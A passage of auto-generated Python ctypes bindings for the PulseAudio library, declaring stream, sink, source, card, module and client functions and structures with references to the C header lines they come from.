pa_stream_get_context.restype = POINTER(pa_context)
pa_stream_get_context.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:400
pa_stream_get_index = _lib.pa_stream_get_index
pa_stream_get_index.restype = c_uint32
pa_stream_get_index.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:411
pa_stream_get_device_index = _lib.pa_stream_get_device_index
pa_stream_get_device_index.restype = c_uint32
pa_stream_get_device_index.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:422
pa_stream_get_device_name = _lib.pa_stream_get_device_name
pa_stream_get_device_name.restype = c_char_p
pa_stream_get_device_name.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:428
pa_stream_is_suspended = _lib.pa_stream_is_suspended
pa_stream_is_suspended.restype = c_int
pa_stream_is_suspended.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:432
pa_stream_is_corked = _lib.pa_stream_is_corked
pa_stream_is_corked.restype = c_int
pa_stream_is_corked.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:458
pa_stream_connect_playback = _lib.pa_stream_connect_playback
pa_stream_connect_playback.restype = c_int
pa_stream_connect_playback.argtypes = [POINTER(pa_stream), c_char_p, POINTER(pa_buffer_attr), pa_stream_flags_t, POINTER(pa_cvolume), POINTER(pa_stream)]
# /usr/include/pulse/stream.h:467
pa_stream_connect_record = _lib.pa_stream_connect_record
pa_stream_connect_record.restype = c_int
pa_stream_connect_record.argtypes = [POINTER(pa_stream), c_char_p, POINTER(pa_buffer_attr), pa_stream_flags_t]
# /usr/include/pulse/stream.h:474
pa_stream_disconnect = _lib.pa_stream_disconnect
pa_stream_disconnect.restype = c_int
pa_stream_disconnect.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:508
pa_stream_begin_write = _lib.pa_stream_begin_write
pa_stream_begin_write.restype = c_int
pa_stream_begin_write.argtypes = [POINTER(pa_stream), POINTER(POINTER(None)), POINTER(c_size_t)]
# /usr/include/pulse/stream.h:522
pa_stream_cancel_write = _lib.pa_stream_cancel_write
pa_stream_cancel_write.restype = c_int
pa_stream_cancel_write.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:547
pa_stream_write = _lib.pa_stream_write
pa_stream_write.restype = c_int
pa_stream_write.argtypes = [POINTER(pa_stream), POINTER(None), c_size_t, pa_free_cb_t, c_int64, pa_seek_mode_t]
# /usr/include/pulse/stream.h:557
#pa_stream_write_ext_free = _lib.pa_stream_write_ext_free
#pa_stream_write_ext_free.restype = c_int
#pa_stream_write_ext_free.argtypes = [POINTER(pa_stream), POINTER(None), c_size_t, pa_free_cb_t, POINTER(None), c_int64, pa_seek_mode_t]
# /usr/include/pulse/stream.h:582
pa_stream_peek = _lib.pa_stream_peek
pa_stream_peek.restype = c_int
pa_stream_peek.argtypes = [POINTER(pa_stream), POINTER(POINTER(None)), POINTER(c_size_t)]
# /usr/include/pulse/stream.h:589
pa_stream_drop = _lib.pa_stream_drop
pa_stream_drop.restype = c_int
pa_stream_drop.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:592
pa_stream_writable_size = _lib.pa_stream_writable_size
pa_stream_writable_size.restype = c_size_t
pa_stream_writable_size.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:595
pa_stream_readable_size = _lib.pa_stream_readable_size
pa_stream_readable_size.restype = c_size_t
pa_stream_readable_size.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:601
pa_stream_drain = _lib.pa_stream_drain
pa_stream_drain.restype = POINTER(pa_operation)
pa_stream_drain.argtypes = [POINTER(pa_stream), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:607
pa_stream_update_timing_info = _lib.pa_stream_update_timing_info
pa_stream_update_timing_info.restype = POINTER(pa_operation)
pa_stream_update_timing_info.argtypes = [POINTER(pa_stream), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:610
pa_stream_set_state_callback = _lib.pa_stream_set_state_callback
pa_stream_set_state_callback.restype = None
pa_stream_set_state_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:614
pa_stream_set_write_callback = _lib.pa_stream_set_write_callback
pa_stream_set_write_callback.restype = None
pa_stream_set_write_callback.argtypes = [POINTER(pa_stream), pa_stream_request_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:617
pa_stream_set_read_callback = _lib.pa_stream_set_read_callback
pa_stream_set_read_callback.restype = None
pa_stream_set_read_callback.argtypes = [POINTER(pa_stream), pa_stream_request_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:620
pa_stream_set_overflow_callback = _lib.pa_stream_set_overflow_callback
pa_stream_set_overflow_callback.restype = None
pa_stream_set_overflow_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:626
pa_stream_get_underflow_index = _lib.pa_stream_get_underflow_index
pa_stream_get_underflow_index.restype = c_int64
pa_stream_get_underflow_index.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:629
pa_stream_set_underflow_callback = _lib.pa_stream_set_underflow_callback
pa_stream_set_underflow_callback.restype = None
pa_stream_set_underflow_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:636
pa_stream_set_started_callback = _lib.pa_stream_set_started_callback
pa_stream_set_started_callback.restype = None
pa_stream_set_started_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:641
pa_stream_set_latency_update_callback = _lib.pa_stream_set_latency_update_callback
pa_stream_set_latency_update_callback.restype = None
pa_stream_set_latency_update_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:648
pa_stream_set_moved_callback = _lib.pa_stream_set_moved_callback
pa_stream_set_moved_callback.restype = None
pa_stream_set_moved_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:658
pa_stream_set_suspended_callback = _lib.pa_stream_set_suspended_callback
pa_stream_set_suspended_callback.restype = None
pa_stream_set_suspended_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:662
pa_stream_set_event_callback = _lib.pa_stream_set_event_callback
pa_stream_set_event_callback.restype = None
pa_stream_set_event_callback.argtypes = [POINTER(pa_stream), pa_stream_event_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:669
pa_stream_set_buffer_attr_callback = _lib.pa_stream_set_buffer_attr_callback
pa_stream_set_buffer_attr_callback.restype = None
pa_stream_set_buffer_attr_callback.argtypes = [POINTER(pa_stream), pa_stream_notify_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:681
pa_stream_cork = _lib.pa_stream_cork
pa_stream_cork.restype = POINTER(pa_operation)
pa_stream_cork.argtypes = [POINTER(pa_stream), c_int, pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:686
pa_stream_flush = _lib.pa_stream_flush
pa_stream_flush.restype = POINTER(pa_operation)
pa_stream_flush.argtypes = [POINTER(pa_stream), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:690
pa_stream_prebuf = _lib.pa_stream_prebuf
pa_stream_prebuf.restype = POINTER(pa_operation)
pa_stream_prebuf.argtypes = [POINTER(pa_stream), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:695
pa_stream_trigger = _lib.pa_stream_trigger
pa_stream_trigger.restype = POINTER(pa_operation)
pa_stream_trigger.argtypes = [POINTER(pa_stream), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:698
pa_stream_set_name = _lib.pa_stream_set_name
pa_stream_set_name.restype = POINTER(pa_operation)
pa_stream_set_name.argtypes = [POINTER(pa_stream), c_char_p, pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:731
pa_stream_get_time = _lib.pa_stream_get_time
pa_stream_get_time.restype = c_int
pa_stream_get_time.argtypes = [POINTER(pa_stream), POINTER(pa_usec_t)]
# /usr/include/pulse/stream.h:745
pa_stream_get_latency = _lib.pa_stream_get_latency
pa_stream_get_latency.restype = c_int
pa_stream_get_latency.argtypes = [POINTER(pa_stream), POINTER(pa_usec_t), POINTER(c_int)]
# /usr/include/pulse/stream.h:761
pa_stream_get_timing_info = _lib.pa_stream_get_timing_info
pa_stream_get_timing_info.restype = POINTER(pa_timing_info)
pa_stream_get_timing_info.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:764
pa_stream_get_sample_spec = _lib.pa_stream_get_sample_spec
pa_stream_get_sample_spec.restype = POINTER(pa_sample_spec)
pa_stream_get_sample_spec.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:767
pa_stream_get_channel_map = _lib.pa_stream_get_channel_map
pa_stream_get_channel_map.restype = POINTER(pa_channel_map)
pa_stream_get_channel_map.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:770
pa_stream_get_format_info = _lib.pa_stream_get_format_info
pa_stream_get_format_info.restype = POINTER(pa_format_info)
pa_stream_get_format_info.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:780
pa_stream_get_buffer_attr = _lib.pa_stream_get_buffer_attr
pa_stream_get_buffer_attr.restype = POINTER(pa_buffer_attr)
pa_stream_get_buffer_attr.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/stream.h:790
pa_stream_set_buffer_attr = _lib.pa_stream_set_buffer_attr
pa_stream_set_buffer_attr.restype = POINTER(pa_operation)
pa_stream_set_buffer_attr.argtypes = [POINTER(pa_stream), POINTER(pa_buffer_attr), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:797
pa_stream_update_sample_rate = _lib.pa_stream_update_sample_rate
pa_stream_update_sample_rate.restype = POINTER(pa_operation)
pa_stream_update_sample_rate.argtypes = [POINTER(pa_stream), c_uint32, pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:805
pa_stream_proplist_update = _lib.pa_stream_proplist_update
pa_stream_proplist_update.restype = POINTER(pa_operation)
pa_stream_proplist_update.argtypes = [POINTER(pa_stream), pa_update_mode_t, POINTER(pa_proplist), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:809
pa_stream_proplist_remove = _lib.pa_stream_proplist_remove
pa_stream_proplist_remove.restype = POINTER(pa_operation)
pa_stream_proplist_remove.argtypes = [POINTER(pa_stream), POINTER(c_char_p), pa_stream_success_cb_t, POINTER(None)]
# /usr/include/pulse/stream.h:815
pa_stream_set_monitor_stream = _lib.pa_stream_set_monitor_stream
pa_stream_set_monitor_stream.restype = c_int
pa_stream_set_monitor_stream.argtypes = [POINTER(pa_stream), c_uint32]
# /usr/include/pulse/stream.h:820
pa_stream_get_monitor_stream = _lib.pa_stream_get_monitor_stream
pa_stream_get_monitor_stream.restype = c_uint32
pa_stream_get_monitor_stream.argtypes = [POINTER(pa_stream)]
class struct_pa_sink_port_info(Structure):
__slots__ = [
'name',
'description',
'priority',
'available',
]
struct_pa_sink_port_info._fields_ = [
('name', c_char_p),
('description', c_char_p),
('priority', c_uint32),
('available', c_int),
]
pa_sink_port_info = struct_pa_sink_port_info # /usr/include/pulse/introspect.h:232
class struct_pa_sink_info(Structure):
__slots__ = [
'name',
'index',
'description',
'sample_spec',
'channel_map',
'owner_module',
'volume',
'mute',
'monitor_source',
'monitor_source_name',
'latency',
'driver',
'flags',
'proplist',
'configured_latency',
'base_volume',
'state',
'n_volume_steps',
'card',
'n_ports',
'ports',
'active_port',
'n_formats',
'formats',
]
struct_pa_sink_info._fields_ = [
('name', c_char_p),
('index', c_uint32),
('description', c_char_p),
('sample_spec', pa_sample_spec),
('channel_map', pa_channel_map),
('owner_module', c_uint32),
('volume', pa_cvolume),
('mute', c_int),
('monitor_source', c_uint32),
('monitor_source_name', c_char_p),
('latency', pa_usec_t),
('driver', c_char_p),
('flags', pa_sink_flags_t),
('proplist', POINTER(pa_proplist)),
('configured_latency', pa_usec_t),
('base_volume', pa_volume_t),
('state', pa_sink_state_t),
('n_volume_steps', c_uint32),
('card', c_uint32),
('n_ports', c_uint32),
('ports', POINTER(POINTER(pa_sink_port_info))),
('active_port', POINTER(pa_sink_port_info)),
('n_formats', c_uint8),
('formats', POINTER(POINTER(pa_format_info))),
]
pa_sink_info = struct_pa_sink_info # /usr/include/pulse/introspect.h:262
pa_sink_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_sink_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:265
# /usr/include/pulse/introspect.h:268
pa_context_get_sink_info_by_name = _lib.pa_context_get_sink_info_by_name
pa_context_get_sink_info_by_name.restype = POINTER(pa_operation)
pa_context_get_sink_info_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_sink_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:271
pa_context_get_sink_info_by_index = _lib.pa_context_get_sink_info_by_index
pa_context_get_sink_info_by_index.restype = POINTER(pa_operation)
pa_context_get_sink_info_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_sink_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:274
pa_context_get_sink_info_list = _lib.pa_context_get_sink_info_list
pa_context_get_sink_info_list.restype = POINTER(pa_operation)
pa_context_get_sink_info_list.argtypes = [POINTER(pa_context), pa_sink_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:277
pa_context_set_sink_volume_by_index = _lib.pa_context_set_sink_volume_by_index
pa_context_set_sink_volume_by_index.restype = POINTER(pa_operation)
pa_context_set_sink_volume_by_index.argtypes = [POINTER(pa_context), c_uint32, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:280
pa_context_set_sink_volume_by_name = _lib.pa_context_set_sink_volume_by_name
pa_context_set_sink_volume_by_name.restype = POINTER(pa_operation)
pa_context_set_sink_volume_by_name.argtypes = [POINTER(pa_context), c_char_p, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:283
pa_context_set_sink_mute_by_index = _lib.pa_context_set_sink_mute_by_index
pa_context_set_sink_mute_by_index.restype = POINTER(pa_operation)
pa_context_set_sink_mute_by_index.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:286
pa_context_set_sink_mute_by_name = _lib.pa_context_set_sink_mute_by_name
pa_context_set_sink_mute_by_name.restype = POINTER(pa_operation)
pa_context_set_sink_mute_by_name.argtypes = [POINTER(pa_context), c_char_p, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:289
pa_context_suspend_sink_by_name = _lib.pa_context_suspend_sink_by_name
pa_context_suspend_sink_by_name.restype = POINTER(pa_operation)
pa_context_suspend_sink_by_name.argtypes = [POINTER(pa_context), c_char_p, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:292
pa_context_suspend_sink_by_index = _lib.pa_context_suspend_sink_by_index
pa_context_suspend_sink_by_index.restype = POINTER(pa_operation)
pa_context_suspend_sink_by_index.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:295
pa_context_set_sink_port_by_index = _lib.pa_context_set_sink_port_by_index
pa_context_set_sink_port_by_index.restype = POINTER(pa_operation)
pa_context_set_sink_port_by_index.argtypes = [POINTER(pa_context), c_uint32, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:298
pa_context_set_sink_port_by_name = _lib.pa_context_set_sink_port_by_name
pa_context_set_sink_port_by_name.restype = POINTER(pa_operation)
pa_context_set_sink_port_by_name.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_context_success_cb_t, POINTER(None)]
class struct_pa_source_port_info(Structure):
__slots__ = [
'name',
'description',
'priority',
'available',
]
struct_pa_source_port_info._fields_ = [
('name', c_char_p),
('description', c_char_p),
('priority', c_uint32),
('available', c_int),
]
pa_source_port_info = struct_pa_source_port_info # /usr/include/pulse/introspect.h:312
class struct_pa_source_info(Structure):
__slots__ = [
'name',
'index',
'description',
'sample_spec',
'channel_map',
'owner_module',
'volume',
'mute',
'monitor_of_sink',
'monitor_of_sink_name',
'latency',
'driver',
'flags',
'proplist',
'configured_latency',
'base_volume',
'state',
'n_volume_steps',
'card',
'n_ports',
'ports',
'active_port',
'n_formats',
'formats',
]
struct_pa_source_info._fields_ = [
('name', c_char_p),
('index', c_uint32),
('description', c_char_p),
('sample_spec', pa_sample_spec),
('channel_map', pa_channel_map),
('owner_module', c_uint32),
('volume', pa_cvolume),
('mute', c_int),
('monitor_of_sink', c_uint32),
('monitor_of_sink_name', c_char_p),
('latency', pa_usec_t),
('driver', c_char_p),
('flags', pa_source_flags_t),
('proplist', POINTER(pa_proplist)),
('configured_latency', pa_usec_t),
('base_volume', pa_volume_t),
('state', pa_source_state_t),
('n_volume_steps', c_uint32),
('card', c_uint32),
('n_ports', c_uint32),
('ports', POINTER(POINTER(pa_source_port_info))),
('active_port', POINTER(pa_source_port_info)),
('n_formats', c_uint8),
('formats', POINTER(POINTER(pa_format_info))),
]
pa_source_info = struct_pa_source_info # /usr/include/pulse/introspect.h:342
pa_source_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_source_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:345
# /usr/include/pulse/introspect.h:348
pa_context_get_source_info_by_name = _lib.pa_context_get_source_info_by_name
pa_context_get_source_info_by_name.restype = POINTER(pa_operation)
pa_context_get_source_info_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_source_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:351
pa_context_get_source_info_by_index = _lib.pa_context_get_source_info_by_index
pa_context_get_source_info_by_index.restype = POINTER(pa_operation)
pa_context_get_source_info_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_source_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:354
pa_context_get_source_info_list = _lib.pa_context_get_source_info_list
pa_context_get_source_info_list.restype = POINTER(pa_operation)
pa_context_get_source_info_list.argtypes = [POINTER(pa_context), pa_source_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:357
pa_context_set_source_volume_by_index = _lib.pa_context_set_source_volume_by_index
pa_context_set_source_volume_by_index.restype = POINTER(pa_operation)
pa_context_set_source_volume_by_index.argtypes = [POINTER(pa_context), c_uint32, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:360
pa_context_set_source_volume_by_name = _lib.pa_context_set_source_volume_by_name
pa_context_set_source_volume_by_name.restype = POINTER(pa_operation)
pa_context_set_source_volume_by_name.argtypes = [POINTER(pa_context), c_char_p, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:363
pa_context_set_source_mute_by_index = _lib.pa_context_set_source_mute_by_index
pa_context_set_source_mute_by_index.restype = POINTER(pa_operation)
pa_context_set_source_mute_by_index.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:366
pa_context_set_source_mute_by_name = _lib.pa_context_set_source_mute_by_name
pa_context_set_source_mute_by_name.restype = POINTER(pa_operation)
pa_context_set_source_mute_by_name.argtypes = [POINTER(pa_context), c_char_p, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:369
pa_context_suspend_source_by_name = _lib.pa_context_suspend_source_by_name
pa_context_suspend_source_by_name.restype = POINTER(pa_operation)
pa_context_suspend_source_by_name.argtypes = [POINTER(pa_context), c_char_p, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:372
pa_context_suspend_source_by_index = _lib.pa_context_suspend_source_by_index
pa_context_suspend_source_by_index.restype = POINTER(pa_operation)
pa_context_suspend_source_by_index.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:375
pa_context_set_source_port_by_index = _lib.pa_context_set_source_port_by_index
pa_context_set_source_port_by_index.restype = POINTER(pa_operation)
pa_context_set_source_port_by_index.argtypes = [POINTER(pa_context), c_uint32, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:378
pa_context_set_source_port_by_name = _lib.pa_context_set_source_port_by_name
pa_context_set_source_port_by_name.restype = POINTER(pa_operation)
pa_context_set_source_port_by_name.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_context_success_cb_t, POINTER(None)]
class struct_pa_server_info(Structure):
__slots__ = [
'user_name',
'host_name',
'server_version',
'server_name',
'sample_spec',
'default_sink_name',
'default_source_name',
'cookie',
'channel_map',
]
struct_pa_server_info._fields_ = [
('user_name', c_char_p),
('host_name', c_char_p),
('server_version', c_char_p),
('server_name', c_char_p),
('sample_spec', pa_sample_spec),
('default_sink_name', c_char_p),
('default_source_name', c_char_p),
('cookie', c_uint32),
('channel_map', pa_channel_map),
]
pa_server_info = struct_pa_server_info # /usr/include/pulse/introspect.h:397
pa_server_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_server_info), POINTER(None)) # /usr/include/pulse/introspect.h:400
# /usr/include/pulse/introspect.h:403
pa_context_get_server_info = _lib.pa_context_get_server_info
pa_context_get_server_info.restype = POINTER(pa_operation)
pa_context_get_server_info.argtypes = [POINTER(pa_context), pa_server_info_cb_t, POINTER(None)]
class struct_pa_module_info(Structure):
__slots__ = [
'index',
'name',
'argument',
'n_used',
'auto_unload',
'proplist',
]
struct_pa_module_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('argument', c_char_p),
('n_used', c_uint32),
('auto_unload', c_int),
('proplist', POINTER(pa_proplist)),
]
pa_module_info = struct_pa_module_info # /usr/include/pulse/introspect.h:421
pa_module_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_module_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:424
# /usr/include/pulse/introspect.h:427
pa_context_get_module_info = _lib.pa_context_get_module_info
pa_context_get_module_info.restype = POINTER(pa_operation)
pa_context_get_module_info.argtypes = [POINTER(pa_context), c_uint32, pa_module_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:430
pa_context_get_module_info_list = _lib.pa_context_get_module_info_list
pa_context_get_module_info_list.restype = POINTER(pa_operation)
pa_context_get_module_info_list.argtypes = [POINTER(pa_context), pa_module_info_cb_t, POINTER(None)]
pa_context_index_cb_t = CFUNCTYPE(None, POINTER(pa_context), c_uint32, POINTER(None)) # /usr/include/pulse/introspect.h:433
# /usr/include/pulse/introspect.h:436
pa_context_load_module = _lib.pa_context_load_module
pa_context_load_module.restype = POINTER(pa_operation)
pa_context_load_module.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_context_index_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:439
pa_context_unload_module = _lib.pa_context_unload_module
pa_context_unload_module.restype = POINTER(pa_operation)
pa_context_unload_module.argtypes = [POINTER(pa_context), c_uint32, pa_context_success_cb_t, POINTER(None)]
class struct_pa_client_info(Structure):
__slots__ = [
'index',
'name',
'owner_module',
'driver',
'proplist',
]
struct_pa_client_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('owner_module', c_uint32),
('driver', c_char_p),
('proplist', POINTER(pa_proplist)),
]
pa_client_info = struct_pa_client_info # /usr/include/pulse/introspect.h:454
pa_client_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_client_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:457
# /usr/include/pulse/introspect.h:460
pa_context_get_client_info = _lib.pa_context_get_client_info
pa_context_get_client_info.restype = POINTER(pa_operation)
pa_context_get_client_info.argtypes = [POINTER(pa_context), c_uint32, pa_client_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:463
pa_context_get_client_info_list = _lib.pa_context_get_client_info_list
pa_context_get_client_info_list.restype = POINTER(pa_operation)
pa_context_get_client_info_list.argtypes = [POINTER(pa_context), pa_client_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:466
pa_context_kill_client = _lib.pa_context_kill_client
pa_context_kill_client.restype = POINTER(pa_operation)
pa_context_kill_client.argtypes = [POINTER(pa_context), c_uint32, pa_context_success_cb_t, POINTER(None)]
class struct_pa_card_profile_info(Structure):
__slots__ = [
'name',
'description',
'n_sinks',
'n_sources',
'priority',
]
struct_pa_card_profile_info._fields_ = [
('name', c_char_p),
('description', c_char_p),
('n_sinks', c_uint32),
('n_sources', c_uint32),
('priority', c_uint32),
]
pa_card_profile_info = struct_pa_card_profile_info # /usr/include/pulse/introspect.h:479
class struct_pa_card_profile_info2(Structure):
__slots__ = [
'name',
'description',
'n_sinks',
'n_sources',
'priority',
'available',
]
struct_pa_card_profile_info2._fields_ = [
('name', c_char_p),
('description', c_char_p),
('n_sinks', c_uint32),
('n_sources', c_uint32),
('priority', c_uint32),
('available', c_int),
]
pa_card_profile_info2 = struct_pa_card_profile_info2 # /usr/include/pulse/introspect.h:496
class struct_pa_card_port_info(Structure):
__slots__ = [
'name',
'description',
'priority',
'available',
'direction',
'n_profiles',
'profiles',
'proplist',
'latency_offset',
'profiles2',
]
struct_pa_card_port_info._fields_ = [
('name', c_char_p),
('description', c_char_p),
('priority', c_uint32),
('available', c_int),
('direction', c_int),
('n_profiles', c_uint32),
('profiles', POINTER(POINTER(pa_card_profile_info))),
('proplist', POINTER(pa_proplist)),
('latency_offset', c_int64),
('profiles2', POINTER(POINTER(pa_card_profile_info2))),
]
pa_card_port_info = struct_pa_card_port_info # /usr/include/pulse/introspect.h:512
class struct_pa_card_info(Structure):
__slots__ = [
'index',
'name',
'owner_module',
'driver',
'n_profiles',
'profiles',
'active_profile',
'proplist',
'n_ports',
'ports',
'profiles2',
'active_profile2',
]
struct_pa_card_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('owner_module', c_uint32),
('driver', c_char_p),
('n_profiles', c_uint32),
('profiles', POINTER(pa_card_profile_info)),
('active_profile', POINTER(pa_card_profile_info)),
('proplist', POINTER(pa_proplist)),
('n_ports', c_uint32),
('ports', POINTER(POINTER(pa_card_port_info))),
('profiles2', POINTER(POINTER(pa_card_profile_info2))),
('active_profile2', POINTER(pa_card_profile_info2)),
]
pa_card_info = struct_pa_card_info # /usr/include/pulse/introspect.h:530
pa_card_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_card_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:533
# /usr/include/pulse/introspect.h:536
pa_context_get_card_info_by_index = _lib.pa_context_get_card_info_by_index
pa_context_get_card_info_by_index.restype = POINTER(pa_operation)
pa_context_get_card_info_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_card_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:539
pa_context_get_card_info_by_name = _lib.pa_context_get_card_info_by_name
pa_context_get_card_info_by_name.restype = POINTER(pa_operation)
pa_context_get_card_info_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_card_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:542
pa_context_get_card_info_list = _lib.pa_context_get_card_info_list
pa_context_get_card_info_list.restype = POINTER(pa_operation)
pa_context_get_card_info_list.argtypes = [POINTER(pa_context), pa_card_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:545
pa_context_set_card_profile_by_index = _lib.pa_context_set_card_profile_by_index
pa_context_set_card_profile_by_index.restype = POINTER(pa_operation)
pa_context_set_card_profile_by_index.argtypes = [POINTER(pa_context), c_uint32, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:548
pa_context_set_card_profile_by_name = _lib.pa_context_set_card_profile_by_name
pa_context_set_card_profile_by_name.restype = POINTER(pa_operation)
pa_context_set_card_profile_by_name.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:551
pa_context_set_port_latency_offset = _lib.pa_context_set_port_latency_offset
pa_context_set_port_latency_offset.restype = POINTER(pa_operation)
pa_context_set_port_latency_offset.argtypes = [POINTER(pa_context), c_char_p, c_char_p, c_int64, pa_context_success_cb_t, POINTER(None)]
class struct_pa_sink_input_info(Structure):
__slots__ = [
'index',
'name',
'owner_module',
'client',
'sink',
'sample_spec',
'channel_map',
'volume',
'buffer_usec',
'sink_usec',
'resample_method',
'driver',
'mute',
'proplist',
'corked',
'has_volume',
'volume_writable',
'format',
]
struct_pa_sink_input_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('owner_module', c_uint32),
('client', c_uint32),
('sink', c_uint32),
('sample_spec', pa_sample_spec),
('channel_map', pa_channel_map),
('volume', pa_cvolume),
('buffer_usec', pa_usec_t),
('sink_usec', pa_usec_t),
('resample_method', c_char_p),
('driver', c_char_p),
('mute', c_int),
('proplist', POINTER(pa_proplist)),
('corked', c_int),
('has_volume', c_int),
('volume_writable', c_int),
('format', POINTER(pa_format_info)),
]
pa_sink_input_info = struct_pa_sink_input_info # /usr/include/pulse/introspect.h:579
pa_sink_input_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_sink_input_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:582
# /usr/include/pulse/introspect.h:585
pa_context_get_sink_input_info = _lib.pa_context_get_sink_input_info
pa_context_get_sink_input_info.restype = POINTER(pa_operation)
